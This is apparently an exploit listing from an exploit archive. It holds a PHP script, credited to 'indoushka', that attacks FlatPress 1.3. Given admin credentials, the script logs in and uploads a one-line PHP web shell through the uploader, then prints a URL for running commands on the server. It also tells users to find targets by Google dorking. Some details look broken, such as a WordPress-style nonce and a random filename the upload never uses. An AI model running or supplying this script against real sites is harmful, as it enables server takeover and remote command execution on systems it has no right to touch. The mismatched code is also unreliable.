Share
## https://sploitus.com/exploit?id=PACKETSTORM:212775
=============================================================================================================================================
    | # Title     : FlatPress 1.3 shell upload Vulnerability                                                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/flatpressblog/flatpress/archive/1.3.zip                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.
    
       (Related : https://packetstorm.news/files/id/178208/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: script.php <base_url> <username> <password>
    
    [+] PayLoad :
    
    <?php
    function random_string($length = 5) {
        // إنشاء سلسلة عشوائية
        $letters = 'abcdefghijklmnopqrstuvwxyz';
        return substr(str_shuffle($letters), 0, $length);
    }
    
    function login_and_upload($base_url, $username, $password) {
        $filename = random_string() . ".php";
        $login_url = "http://{$base_url}/login.php";
        $upload_url = "http://{$base_url}/admin.php?p=uploader&action=default";
    
        // إنشاء جلسة cURL جديدة
        $ch = curl_init();
    
        // إعداد خيارات cURL للدخول
        $login_data = [
            'user' => $username,
            'pass' => $password,
            'submit' => 'Login'
        ];
    
        curl_setopt($ch, CURLOPT_URL, $login_url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
    
        // تنفيذ الطلب
        $response = curl_exec($ch);
    
        if (strpos($response, 'Logout') !== false) {
            echo "Login Successful!\n";
        } else {
            echo "Login Failed!\n";
            echo $response;
            return;
        }
    
        // تحميل الملف
        echo "Shell uploading...\n";
    
        // إعداد بيانات الفورم لرفع الملف
        $files = [
            'upload[]' => new CURLFile('php://memory', 'text/php', '<?php echo `$_GET[0]`; ?>')
        ];
        $form_data = [
            '_wpnonce' => '9e0ed04260',
            '_wp_http_referer' => '/admin.php?p=uploader',
            'upload' => 'Upload'
        ];
    
        curl_setopt($ch, CURLOPT_URL, $upload_url);
        curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($form_data, $files));
    
        // تنفيذ طلب رفع الملف
        $response = curl_exec($ch);
    
        if (strpos($response, 'File(s) uploaded') !== false || strpos($response, 'Upload') !== false) {
            $shell_url = "http://{$base_url}/fp-content/attachs/{$filename}";
            echo "Your Shell is Ready: {$shell_url}\n";
            echo "Shell Usage: {$shell_url}?0=command\n";
        } else {
            echo "Exploit Failed!\n";
            echo $response;
        }
    
        // إغلاق جلسة cURL
        curl_close($ch);
    }
    
    // مثال استخدام
    if ($argc != 4) {
        echo "Usage: script.php <base_url> <username> <password>\n";
    } else {
        list($script, $base_url, $username, $password) = $argv;
        login_and_upload($base_url, $username, $password);
    }
    ?>
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================